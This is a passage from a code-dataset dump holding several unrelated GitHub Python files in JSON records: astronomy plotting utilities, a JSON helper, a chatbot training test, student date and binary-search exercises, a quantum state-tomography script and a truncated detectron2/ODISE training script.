ax.set_title(\"param velocity\")\n ax.legend()\n return f, axes\n\n\n@export\ndef plot_mcmc_behaviour(ax, samples_mcmc, param_mcmc, dist_mcmc=None, num_average=100):\n \"\"\"Plots the MCMC behaviour and looks for convergence of the chain.\n\n :param ax: matplotlib.axis instance\n :param samples_mcmc: parameters sampled 2d numpy array\n :param param_mcmc: list of parameters\n :param dist_mcmc: log likelihood of the chain\n :param num_average: number of samples to average (should coincide with the number of\n samples in the emcee process)\n :return:\n \"\"\"\n num_samples = len(samples_mcmc[:, 0])\n num_average = int(num_average)\n n_points = int((num_samples - num_samples % num_average) / num_average)\n for i, param_name in enumerate(param_mcmc):\n samples = samples_mcmc[:, i]\n samples_averaged = np.average(\n samples[: int(n_points * num_average)].reshape(n_points, num_average),\n axis=1,\n )\n end_point = np.mean(samples_averaged)\n samples_renormed = (samples_averaged - end_point) / np.std(samples_averaged)\n ax.plot(samples_renormed, label=param_name)\n\n if dist_mcmc is not None:\n dist_averaged = -np.max(\n dist_mcmc[: int(n_points * num_average)].reshape(n_points, num_average),\n axis=1,\n )\n dist_normed = (dist_averaged - np.max(dist_averaged)) / (\n np.max(dist_averaged) - np.min(dist_averaged)\n )\n ax.plot(dist_normed, label=\"logL\", color=\"k\", linewidth=2)\n ax.legend()\n return ax\n\n\n@export\ndef psf_iteration_compare(kwargs_psf, **kwargs):\n \"\"\"\n\n :param kwargs_psf: keyword arguments that initiate a PSF() class\n :param kwargs: kwargs to send to matplotlib.pyplot.matshow()\n :return:\n \"\"\"\n psf_out = kwargs_psf[\"kernel_point_source\"]\n psf_in = kwargs_psf[\"kernel_point_source_init\"]\n # psf_error_map = kwargs_psf.get('psf_error_map', None)\n from lenstronomy.Data.psf 
import PSF\n\n psf = PSF(**kwargs_psf)\n # psf_out = psf.kernel_point_source\n psf_error_map = psf.psf_error_map\n n_kernel = len(psf_in)\n delta_x = n_kernel / 20.0\n delta_y = n_kernel / 10.0\n\n if \"cmap\" not in kwargs:\n kwargs[\"cmap\"] = \"seismic\"\n\n n = 3\n if psf_error_map is not None:\n n += 1\n f, axes = plt.subplots(1, n, figsize=(5 * n, 5))\n ax = axes[0]\n im = ax.matshow(np.log10(psf_in), origin=\"lower\", **kwargs)\n v_min, v_max = im.get_clim()\n if \"vmin\" not in kwargs:\n kwargs[\"vmin\"] = v_min\n if \"vmax\" not in kwargs:\n kwargs[\"vmax\"] = v_max\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"Initial PSF model\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n ax = axes[1]\n im = ax.matshow(np.log10(psf_out), origin=\"lower\", **kwargs)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"iterative reconstruction\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n ax = axes[2]\n kwargs_new = copy.deepcopy(kwargs)\n\n del kwargs_new[\"vmin\"]\n del kwargs_new[\"vmax\"]\n\n im = ax.matshow(\n psf_out - psf_in, origin=\"lower\", vmin=-(10**-3), vmax=10**-3, **kwargs_new\n )\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"difference\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n if psf_error_map is not None:\n ax = axes[3]\n im = ax.matshow(\n np.log10(psf_error_map * psf.kernel_point_source**2),\n origin=\"lower\",\n **kwargs\n )\n n_kernel = len(psf_error_map)\n delta_x = n_kernel / 20.0\n delta_y = n_kernel / 10.0\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"psf error map\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n f.tight_layout()\n return f, axes\n","repo_name":"lenstronomy/lenstronomy","sub_path":"lenstronomy/Plots/chain_plot.py","file_name":"chain_plot.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"22"} +{"seq_id":"13755503621","text":"import json\n\n\n# =====================================================================\n\n\ndef t_dict_save(file_path, dict):\n if isinstance(dict, str):\n dict = eval(dict)\n with open(file_path, 'w', encoding='utf-8') as f:\n str_ = json.dumps(dict, ensure_ascii=False)\n f.write(str_)\n\n\ndef t_dict_load(file_path):\n dict = {}\n with open(file_path, 'r', encoding='utf-8') as f:\n data = f.readline().strip()\n dict = json.loads(data)\n return dict","repo_name":"cxm2048/dave","sub_path":"Project/Python/project/public/tools/t_dict.py","file_name":"t_dict.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21723894251","text":"from chatterbot import ChatBot\nimport sys\nfrom threading 
import Thread\nimport string\nimport random\n\ndef random_string(length):\n return ''.join(random.choice(string.ascii_letters) for m in range(length))\n\ndef trainThread(i, length):\n chatbot = ChatBot(\n 'Throughput-bot-'+str(i),\n trainer='chatterbot.trainers.ListTrainer'\n )\n print(\"start train \"+chatbot.name)\n trainSet = [random_string(16) for i in range(length)]\n for i in range(length):\n chatbot.train(trainSet)\n\nif __name__ == \"__main__\":\n length = int(sys.argv[1])\n width = int(sys.argv[2])\n print(\"Run throughput with %d threads of size %d\" % (width, length))\n threads = []\n for i in range(width):\n threads.append(Thread(target=trainThread, args=(i, length), name=str(i)))\n\n for thread in threads:\n thread.start()\n\n for thread in threads:\n thread.join()\n","repo_name":"wlwlw/achatbot","sub_path":"trainTest.py","file_name":"trainTest.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34001705228","text":"# Ask the user for three inputs\nyear = int(input('Insert the year: '))\nmonth = int(input('Insert the month: '))\nday = int(input('Insert the day: '))\n\n# Define months lists and new year, month, day variables\nmonth_30 = [4, 6, 9, 11]\nmonth_31 = [1, 3, 5, 7, 8, 10]\ndecember = 12\nfebruary = 2\nnew_year = year\nnew_month = month\nnew_day = day\n\ndef change_day(day):\n new_day = day + 1\n return new_day\n\n# Create a function to change month (and year in case of December)\ndef change_month(month, year):\n if month == 12:\n new_day = 1\n new_month = 1\n new_year = year + 1\n\n else: \n new_day = 1\n new_month = month + 1\n new_year = year\n \n return new_day, new_month, new_year\n \n\ndef my_fun(new_year, new_month, new_day):\n # Define the possibilities with February and leap years with appropriate\n # error message\n if month == february:\n if year % 400 == 0 or (year % 100 != 0 and year % 4 == 0):\n if day == 29:\n new_day, new_month, new_year = change_month(month, year)\n elif 0 < day <= 28:\n new_day = change_day(day)\n else:\n print('ERROR! maybe this date does not exist')\n return\n elif day == 28:\n new_day, new_month, new_year = change_month(month, year)\n elif day > 28:\n print('ERROR! this is not a leap year')\n return\n elif day <= 0:\n print('ERROR! maybe this date does not exist')\n return\n else:\n new_day = change_day(day)\n \n # Define the possibilities with 30-day months with appropriate error message \n elif month in month_30:\n if day == 30:\n new_day, new_month, new_year = change_month(month, year)\n elif day <=0 or day > 30:\n print('ERROR! maybe this date does not exist')\n return\n else:\n new_day = change_day(day)\n\n # Define the possibilities with 31-day months with appropriate error message\n elif month in month_31: \n if day == 31:\n new_day, new_month, new_year = change_month(month, year)\n elif day <=0 or day > 31:\n print('ERROR! maybe this date does not exist')\n return\n else:\n new_day = change_day(day)\n\n # Define the possibilities with December and new year \n # with appropriate error message\n elif month == december:\n if day == 31:\n new_day, new_month, new_year = change_month(month, year) \n print('HAPPY NEW YEAR!!!')\n elif day <=0 or day > 31:\n print('ERROR! maybe this date does not exist') \n return \n else:\n new_day = change_day(day)\n\n else:\n print('ERROR! 
maybe this date does not exist') \n return \n\n # Format the output of days and months\n format_day = '{:02d}'.format(new_day)\n format_month = '{:02d}'.format(new_month)\n\n # Display the output\n print('Tomorrow will be ' + str(new_year) + '-' + str(format_month) + '-' + str(format_day))\n\nmy_fun(year, month, day)","repo_name":"AlexCartura/Tomorrowdevs","sub_path":"programming-basics/projects/m1/016-next-day/solutions/stefanocroci/sol_016_next_day.py","file_name":"sol_016_next_day.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24633710285","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport time as t\nfrom random import randint\nimport plotly.express as px\nimport re\n\nbot_bound = 0\ntop_bound = 100\n\n\n# In[2]:\n\n\ndef binary_search(data: list, number: int):\n\n mid = len(data) // 2\n low = 0\n high = len(data) - 1\n start_time = t.time()\n \n data.sort()\n \n while data[mid] != number and low <= high:\n if number > data[mid]:\n low = mid + 1\n else:\n high = mid - 1\n mid = (low + high) // 2\n\n if low > high:\n print(\"Key not found\")\n else:\n print(f\"Key {mid} found\")\n \n finish_time = t.time()\n \n return finish_time - start_time\n\n# = 1 + 3*(n-1) + (n-1)*f(the for loop over j) = 1 + 3*(n-1) + (n-1)*(1 + 3*(n-1) + (n-1)*(2+2+1+2+2+2+2+1)) =\n# = 1+3n-3+(n-1)*(1+3n-3+14n-14)=-2+3n+(n-1)*(17n-16)=2 + 3n + 17n^2 - 33*n + 16 = 17n^2 - 30*n + 18\n\n# = 1 + 3*n + n*f(the while loop)=1 + 3*n + n*()= 14*n+1\n\n# = 1\n\n\n#17n^2 + -16n + 20\n\n\n# In[3]:\n\n\narray = [randint(0,100) for _ in range(20)]\ntime = binary_search(array, 100)\nprint(f\"Algorithm execution time: {time} seconds\")\n\n\n# In[4]:\n\n\ndef evaluate_results(repetitions: int) -> list:\n results = []\n n=0\n for _ in range(repetitions):\n n+=5000\n data = [randint(0,100) for _ in range(n)]\n random_number=randint(0,1000)\n start_time = t.time()\n evaluated_time = binary_search(data, random_number)\n finish_time = t.time()\n results.append((n, evaluated_time))\n return results\n\n\n# In[5]:\n\n\ndef build_chart(raw):\n chart_data = []\n\n for (n, time) in raw:\n chart_data.append(\n dict(\n size=n,\n evaluation=time\n )\n )\n fig = px.line(chart_data, x=\"size\", y=\"evaluation\")\n fig.show()\n\n\n# In[8]:\n\n\nbuild_chart(sorted(evaluate_results(100), key=lambda tup: tup[0]))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"PetraSChka/algorith","sub_path":"lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12424532056","text":"## Graphical comparison between estimation in HELMI and IBMQ\n## Imports\nimport sys\nimport argparse\nfrom argparse import RawTextHelpFormatter\n\nfrom qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister, Aer, BasicAer, execute\nfrom qiskit.compiler import transpile\nfrom qiskit.dagcircuit import DAGCircuit\nfrom qiskit.converters import circuit_to_dag\nfrom qiskit.visualization import plot_bloch_vector\nfrom qiskit.quantum_info import state_fidelity\nfrom qiskit.transpiler.passes import RemoveBarriers\nfrom qiskit import IBMQ\n\nimport matplotlib.pyplot as plt\nimport numpy as np\npi = np.pi\nj = complex(0,1)\n\ndef get_args():\n\n args_parser = argparse.ArgumentParser(\n description=\"\"\"Qubit state estimation\"\"\",\n formatter_class=RawTextHelpFormatter,\n epilog=\"\"\"Example usage:\n 
python Plus_estim.py --backend simulator\n \"\"\",\n )\n\n # Parse Arguments\n\n args_parser.add_argument(\n \"--backend\",\n help=\"\"\"\n Define the backend for running the program.\n 'aer'/'simulator' runs on Qiskit's aer simulator,\n 'helmi' runs on VTT Helmi Quantum Computer,\n 'fake_helmi' runs in the fake helmi simulator\n \"\"\",\n required=False,\n type=str,\n default=None,\n choices=[\"helmi\", \"simulator\", \"IBMQ\", \"fake_helmi\"],\n )\n\n\n return args_parser.parse_args()\n\ndef Initialization(angles = [0,0,0]):\n\n qr = QuantumRegister(3)\n qc = QuantumCircuit(qr)\n\n #Initialize qubits\n qc.h(qr[0]) #A meter\n qc.h(qr[2]) #B meter\n qc.u(angles[0],angles[1],angles[2],[qr[1]]) #System\n\n Init_gate = qc.to_gate()\n Init_gate.name= \"Initialization\"\n\n return Init_gate\n\ndef U_operator(A=[0,0,0,0,0,0],B=[0,0,0,0,0,0]):\n\n ## A and B are vectors with the rotation angles of the meters A and B\n qr = QuantumRegister(3)\n qc = QuantumCircuit(qr)\n\n #####==================================#####\n #####======= Evolution operator =======#####\n #####==================================#####\n\n\n\n ## We apply rotations around a CNOT between the S and A qubits\n qc.u(A[0],A[1],A[2],qr[0])\n qc.cx(qr[1],qr[0])\n qc.u(A[3],A[4],A[5],qr[0])\n\n\n ## We change the basis of the S qubit\n qc.h(qr[1])\n\n ## Now, we apply rotations around a CNOT between the S and B qubits\n qc.u(B[0],B[1],B[2],qr[2])\n qc.cx(qr[1],qr[2])\n qc.u(B[3],B[4],B[5],qr[2])\n\n ## We revert the hadamard transformation over S\n qc.h(qr[1])\n\n U_gate=qc.to_gate()\n U_gate.name=\"U Operator\"\n\n return U_gate\n\ndef U_matrix(angles_a,angles_b):\n ## We define the qubits the gate acts on\n A = QuantumRegister(1,'a')\n S = QuantumRegister(1,'s')\n B = QuantumRegister(1,'b')\n cr = ClassicalRegister(3)\n\n ## We apply the gate to these registers\n qc = QuantumCircuit(A,S,B, cr)\n qc.append(U_operator(angles_a,angles_b),[A,S,B])\n\n ## We use IBM's simulator to obtain the matrix associated with the operator\n backend = BasicAer.get_backend('unitary_simulator')\n job = execute(qc, backend)\n U = job.result().get_unitary(qc)\n return U\n\ndef T_matrix(U):\n\n ## we define the U_{ij} operators\n U_00 = np.matrix(np.array([[U[0,0],U[0,2]],[U[2,0],U[2,2]]]) + np.array([[U[0,1],U[0,3]],[U[2,1],U[2,3]]]) + np.array([[U[0,4],U[0,6]],[U[2,4],U[2,6]]]) + np.array([[U[0,5],U[0,7]],[U[2,5],U[2,7]]]))\n U_01 = np.matrix(np.array([[U[1,0],U[1,2]],[U[3,0],U[3,2]]]) + np.array([[U[1,1],U[1,3]],[U[3,1],U[3,3]]]) + np.array([[U[1,4],U[1,6]],[U[3,4],U[3,6]]]) + np.array([[U[1,5],U[1,7]],[U[3,5],U[3,7]]]))\n U_10 = np.matrix(np.array([[U[4,0],U[4,2]],[U[6,0],U[6,2]]]) + np.array([[U[4,1],U[4,3]],[U[6,1],U[6,3]]]) + np.array([[U[4,4],U[4,6]],[U[6,4],U[6,6]]]) + np.array([[U[4,5],U[4,7]],[U[6,5],U[6,7]]]))\n U_11 = np.matrix(np.array([[U[5,0],U[5,2]],[U[7,0],U[7,2]]]) + np.array([[U[5,1],U[5,3]],[U[7,1],U[7,3]]]) + np.array([[U[5,4],U[5,6]],[U[7,4],U[7,6]]]) + np.array([[U[5,5],U[5,7]],[U[7,5],U[7,7]]]))\n\n ## and their adjoints\n U_00d = U_00.getH()\n U_01d = U_01.getH()\n U_10d = U_10.getH()\n U_11d = U_11.getH()\n\n ## The auxiliary operators A, B and C\n A = 1/16*(np.matmul(U_00d,U_10) + np.matmul(U_01d,U_11) + np.matmul(U_10d,U_00) + np.matmul(U_11d,U_01))\n B = 1/16*(np.matmul(U_00d,U_01) + np.matmul(U_01d,U_00) + np.matmul(U_10d,U_11) + np.matmul(U_11d,U_10))\n C = 1/16*(np.matmul(U_00d,U_11) + np.matmul(U_01d,U_10) + np.matmul(U_10d,U_01) + np.matmul(U_11d,U_00))\n\n ## We define the Pauli matrices and the 
identity\n X = np.matrix([[0,1],[1,0]])\n Y = np.matrix([[0,-j],[j,0]])\n Z = np.matrix([[1,0],[0,-1]])\n I = np.matrix([[1,0],[0,1]])\n\n ## We evaluate the components of the a_\mu, b_\mu and c_\mu vectors\n a0 = 0.5*np.trace(np.matmul(A,I))\n a1 = 0.5*np.trace(np.matmul(A,X))\n a2 = 0.5*np.trace(np.matmul(A,Y))\n a3 = 0.5*np.trace(np.matmul(A,Z))\n\n b0 = 0.5*np.trace(np.matmul(B,I))\n b1 = 0.5*np.trace(np.matmul(B,X))\n b2 = 0.5*np.trace(np.matmul(B,Y))\n b3 = 0.5*np.trace(np.matmul(B,Z))\n\n c0 = 0.5*np.trace(np.matmul(C,I))\n c1 = 0.5*np.trace(np.matmul(C,X))\n c2 = 0.5*np.trace(np.matmul(C,Y))\n c3 = 0.5*np.trace(np.matmul(C,Z))\n\n T = np.matrix([[0.25+a0+b0+c0, a1+b1+c1, a2+b2+c2, a3+b3+c3],[0.25+a0-b0-c0, a1-b1-c1, a2-b2-c2, a3-b3-c3],[0.25-a0+b0-c0, -a1+b1-c1, -a2+b2-c2, -a3+b3-c3],[0.25-a0-b0+c0, -a1-b1+c1, -a2-b2+c2, -a3-b3+c3]])\n return T\n\ndef bloch_vector_to_state(s):\n ## We transform the bloch vector into a qubit state\n s1 = s[0]\n s2 = s[1]\n s3 = s[2]\n\n if (s3>0):\n th=np.arctan(np.sqrt(s1*s1 + s2*s2)/s3)\n elif (s3 == 0):\n th = pi/2\n elif (s3 < 0):\n th=np.arctan(np.sqrt(s1*s1 + s2*s2)/s3) + pi\n\n if (s1>0 and s2>0):\n phi = np.arctan(s2/s1)\n elif (s1>0 and s2<0):\n phi = np.arctan(s2/s1) + 2*pi\n elif (s1 == 0):\n phi = pi/2*np.sign(s2)\n elif (s1<0):\n phi = np.arctan(s2/s1) + pi\n\n ## We write the alpha and beta amplitudes\n c_0 = np.cos(th/2)\n c_1 = (np.cos(phi) + complex(0,1)*np.sin(phi))*np.sin(th/2)\n\n state = np.array([c_0,c_1])\n return state\n\ndef init_ang_to_bloch_vector(angles):\n\n th, phi, lam = angles\n\n s = np.array([np.sin(th)*np.cos(phi), np.sin(th)*np.sin(phi), np.cos(th)])\n\n return s\n\n\ndef disc_ML_est(mm,freq):\n ## Function for maximum-likelihood estimation\n ## mm = measurement matrix\n ## freq = probabilities from the experiment\n mm = np.array(mm)\n se = np.array([1.0,0.0,0.0,0.0])\n nint = 10000\n for k in range(1,nint):\n pe = np.dot(mm,se)\n\n re = np.dot(np.transpose(mm),(freq/pe))\n\n ge = re[1]**2 + re[2]**2 + re[3]**2 - re[0]**2\n se[1] = (2*re[1]-se[1]*ge)/(2*re[0]+ge)\n se[2] = (2*re[2]-se[2]*ge)/(2*re[0]+ge)\n se[3] = (2*re[3]-se[3]*ge)/(2*re[0]+ge)\n return se\n\ndef main():\n\n args = get_args()\n shots = 1024\n th_a1,phi_a1,lam_a1,th_b1,phi_b1,lam_b1 = 0.5871626, 1.57737493, 2.52063619, 0.70004151, 4.30553732, 3.45993977\n th_a2,phi_a2,lam_a2,th_b2,phi_b2,lam_b2 = 2.55283129, 1.93819982, 0.30976956, 0.67288561, 6.47455126, 4.4695403\n\n angles_a=[th_a1,phi_a1,lam_a1,th_a2,phi_a2,lam_a2]\n angles_b=[th_b1,phi_b1,lam_b1,th_b2,phi_b2,lam_b2]\n\n\n\n U = U_matrix(angles_a,angles_b)\n T = T_matrix(U)\n\n ## Initial angles of the rotation that defines the initial state of the qubit S\n angle_i=[pi/2,0,0]\n\n ## Quantum registers of the A, B and S qubits\n A = QuantumRegister(1,'a')\n S = QuantumRegister(1,'s')\n B = QuantumRegister(1,'b')\n cr = ClassicalRegister(3)\n\n ## Circuit initialization\n tomography_circuit = QuantumCircuit(A,S,B, cr)\n\n ## We initialize our qubits\n tomography_circuit.append(Initialization(angle_i),[A,S,B])\n tomography_circuit.barrier()\n\n ## Apply the evolution operator\n tomography_circuit.append(U_operator(angles_a,angles_b),[A,S,B])\n tomography_circuit.barrier()\n\n ## Change the measurement basis\n tomography_circuit.h(A) #A\n tomography_circuit.h(B) #B\n tomography_circuit.barrier()\n\n ## Measurement of the A and B meters\n tomography_circuit.measure(A,cr[0]) #A\n tomography_circuit.measure(B,cr[2]) #B\n\n print(\"Running on backend = \", args.backend)\n\n if args.backend == 
\"simulator\" or args.backend == \"aer\":\n\n backend = Aer.get_backend('qasm_simulator')\n basis_gates = backend.configuration().basis_gates\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024).result()\n \n elif args.backend == \"IBMQ\":\n IBMQ.load_account()\n\n provider=IBMQ.get_provider('ibm-q')\n backend = provider.get_backend('ibmq_lima')\n\n basis_gates = backend.configuration().basis_gates\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n print(\"Running on \", backend.configuration().backend_name)\n\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024).result()\n\n elif args.backend == \"helmi\":\n from csc_qu_tools.qiskit import Helmi as helmi\n provider = helmi()\n backend = provider.set_backend()\n basis_gates = provider.basis_gates\n\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n virtual_qubits = transpiled_tomography_circuit.qubits\n qubit_mapping = {\n virtual_qubits[0]: \"QB1\",\n virtual_qubits[1]: \"QB3\",\n virtual_qubits[2]: \"QB2\",\n }\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024, qubit_mapping=qubit_mapping).result()\n\n elif args.backend == \"fake_helmi\":\n from csc_qu_tools.qiskit.mock import FakeHelmi\n\n print(\n \"Inducing artificial noise into Simulator with FakeHelmi Noise Model\"\n )\n basis_gates = [\"r\", \"cz\"]\n backend = FakeHelmi()\n\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n virtual_qubits = transpiled_tomography_circuit.qubits\n qubit_mapping = {\n virtual_qubits[0]: \"QB1\",\n virtual_qubits[1]: \"QB3\",\n virtual_qubits[2]: \"QB2\",\n }\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024, qubit_mapping=qubit_mapping).result()\n\n\n else:\n sys.exit(\"Backend option not recognized\")\n\n Sim_result_counts_tomography_circuit = Sim_result_tomography_circuit.get_counts()\n\n ## We build the vector P\n if '000' in Sim_result_counts_tomography_circuit:\n p00 = Sim_result_counts_tomography_circuit['000']/shots\n else:\n p00 = 0\n\n if '001' in Sim_result_counts_tomography_circuit:\n p01 = Sim_result_counts_tomography_circuit['001']/shots\n else:\n p01 = 0\n if '100' in Sim_result_counts_tomography_circuit:\n p10 = Sim_result_counts_tomography_circuit['100']/shots\n else:\n p10 = 0\n if '101' in Sim_result_counts_tomography_circuit:\n p11 = Sim_result_counts_tomography_circuit['101']/shots\n else:\n p11 = 0\n\n p = np.array([p00, p01, p10, p11])\n print(p*shots)\n U = U_matrix(angles_a, angles_b)\n T = T_matrix(U)\n \n s = np.array(np.matmul(np.linalg.inv(T),p), ndmin=0)\n s = np.reshape(s,4)\n\n s_ml = disc_ML_est(T, p)\n s_test_ml = [s_ml[1], s_ml[2], s_ml[3]]\n print(s)\n\n s1=s[1].real\n s2=s[2].real\n s3=s[3].real\n\n s_test = [s1,s2,s3]\n\n s_ideal = init_ang_to_bloch_vector(angle_i)\n ## Initialize a 1 qubit circuit\n qr = QuantumRegister(1)\n cr = ClassicalRegister(1)\n\n qc_i = QuantumCircuit(qr,cr)\n\n ## Use the U rotation that we used for 
initializing the qubit S\n qc_i.u(angle_i[0],angle_i[1],angle_i[2],qr[0])\n\n backend = BasicAer.get_backend('statevector_simulator')\n result = execute(qc_i, backend).result()\n\n ## Take the statevector\n initial_state = result.get_statevector(qc_i)\n estim_state = bloch_vector_to_state(s_test)\n estim_state_ml = bloch_vector_to_state(s_test_ml)\n\n ## Calculate the fidelity\n fidelity = state_fidelity(initial_state,estim_state)\n fidelity_ml = state_fidelity(initial_state,estim_state_ml)\n print('Estimation fidelity: ',fidelity)\n print('Estimation norm: ', np.linalg.norm(s_test))\n\n print('Estimation fidelity: ',fidelity_ml)\n print('Estimation norm: ', np.linalg.norm(s_test_ml))\n\n\n ## Save the plots for visualization\n plot_bloch_vector(s_test, title=\"Estimated state\").savefig(\"figures/estimation_test_\"+args.backend+\".pdf\")\n plot_bloch_vector(s_test_ml, title=\"Estimated state\").savefig(\"figures/estimation_test_\"+args.backend+\"_ml.pdf\")\n plot_bloch_vector(s_ideal, title=\"Initial state\").savefig(\"figures/initial_test.pdf\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"cagalvisf/Qubit_state_estimation","sub_path":"Plus_QSE_test.py","file_name":"Plus_QSE_test.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"75176757495","text":"import argparse\nimport logging\nimport os.path as osp\nfrom contextlib import ExitStack\nfrom typing import MutableSequence\nfrom detectron2.config import LazyConfig, instantiate\nfrom detectron2.engine import create_ddp_model, default_argument_parser, hooks, launch\nfrom detectron2.evaluation import print_csv_format\nfrom detectron2.utils import comm\nfrom detectron2.utils.events import JSONWriter\nfrom detectron2.utils.file_io import PathManager\nfrom detectron2.utils.logger import setup_logger\nfrom iopath.common.s3 import S3PathHandler\nfrom omegaconf import OmegaConf\n\nfrom odise.checkpoint import ODISECheckpointer\nfrom odise.config import auto_scale_workers, instantiate_odise\nfrom odise.engine.defaults import default_setup, get_dataset_from_loader, get_model_from_module\nfrom odise.engine.hooks import EvalHook\nfrom odise.engine.train_loop import AMPTrainer, SimpleTrainer\nfrom odise.evaluation import inference_on_dataset\nfrom odise.utils.events import CommonMetricPrinter, WandbWriter, WriterStack\n\nPathManager.register_handler(S3PathHandler())\n\nlogger = logging.getLogger(\"odise\")\n\n\ndef default_writers(cfg):\n \"\"\"\n Build a list of :class:`EventWriter` to be used.\n It now consists of a :class:`CommonMetricPrinter`,\n :class:`TensorboardXWriter` and :class:`JSONWriter`.\n\n Args:\n output_dir: directory to store JSON metrics and tensorboard events\n max_iter: the total number of iterations\n\n Returns:\n list[EventWriter]: a list of :class:`EventWriter` objects.\n \"\"\"\n if \"log_dir\" in cfg.train:\n log_dir = cfg.train.log_dir\n else:\n log_dir = cfg.train.output_dir\n PathManager.mkdirs(log_dir)\n ret = [\n # It may not always print what you want to see, since it prints \"common\" metrics only.\n CommonMetricPrinter(\n cfg.train.max_iter, run_name=osp.join(cfg.train.run_name, cfg.train.run_tag)\n ),\n JSONWriter(osp.join(log_dir, \"metrics.json\")),\n ]\n if cfg.train.wandb.enable_writer:\n ret.append(\n WandbWriter(\n max_iter=cfg.train.max_iter,\n run_name=osp.join(cfg.train.run_name, cfg.train.run_tag),\n output_dir=log_dir,\n project=cfg.train.wandb.project,\n config=OmegaConf.to_container(cfg, 
resolve=False),\n resume=cfg.train.wandb.resume,\n )\n )\n\n return ret\n\n\nclass InferenceRunner:\n def __init__(self, cfg, model):\n self.cfg = cfg\n self.model = model\n\n def __call__(self, final_iter=False, next_iter=0):\n return do_test(self.cfg, self.model, final_iter=final_iter, next_iter=next_iter)\n\n\ndef do_test(cfg, model, *, final_iter=False, next_iter=0):\n all_ret = dict()\n # make a copy incase we modify it every time calling do_test\n cfg = OmegaConf.create(cfg)\n\n # BC for detectron\n if \"evaluator\" in cfg.dataloader and \"test\" in cfg.dataloader:\n task_final_iter_only = cfg.dataloader.get(\"final_iter_only\", False)\n task_eval_period = cfg.dataloader.get(\"eval_period\", 1)\n if not final_iter and (task_final_iter_only or next_iter % task_eval_period != 0):\n logger.info(\n f\"Skip test set evaluation at iter {next_iter}, \"\n f\"since task_final_iter_only={task_final_iter_only}, \"\n f\"next_iter {next_iter} % task_eval_period {task_eval_period}\"\n f\"={next_iter % task_eval_period} != 0\"\n )\n else:\n loader = instantiate(cfg.dataloader.test)\n\n if \"wrapper\" in cfg.dataloader:\n wrapper_cfg = cfg.dataloader.wrapper\n # look for the last wrapper\n while \"model\" in wrapper_cfg:\n wrapper_cfg = wrapper_cfg.model\n wrapper_cfg.model = get_model_from_module(model)\n # poping _with_dataset_\n if wrapper_cfg.pop(\"_with_dataset_\", False):\n wrapper_cfg.dataset = get_dataset_from_loader(loader)\n inference_model = create_ddp_model(instantiate(cfg.dataloader.wrapper))\n else:\n inference_model = model\n\n # poping _with_dataset_\n if isinstance(cfg.dataloader.evaluator, MutableSequence):\n for i in range(len(cfg.dataloader.evaluator)):\n if cfg.dataloader.evaluator[i].pop(\"_with_dataset_\", False):\n cfg.dataloader.evaluator[i].dataset = get_dataset_from_loader(loader)\n else:\n if cfg.dataloader.evaluator.pop(\"_with_dataset_\", False):\n cfg.dataloader.evaluator.dataset = get_dataset_from_loader(loader)\n\n ret = inference_on_dataset(\n inference_model,\n loader,\n instantiate(cfg.dataloader.evaluator),\n use_amp=cfg.train.amp.enabled,\n )\n print_csv_format(ret)\n all_ret.update(ret)\n if \"extra_task\" in cfg.dataloader:\n for task in cfg.dataloader.extra_task:\n task_final_iter_only = 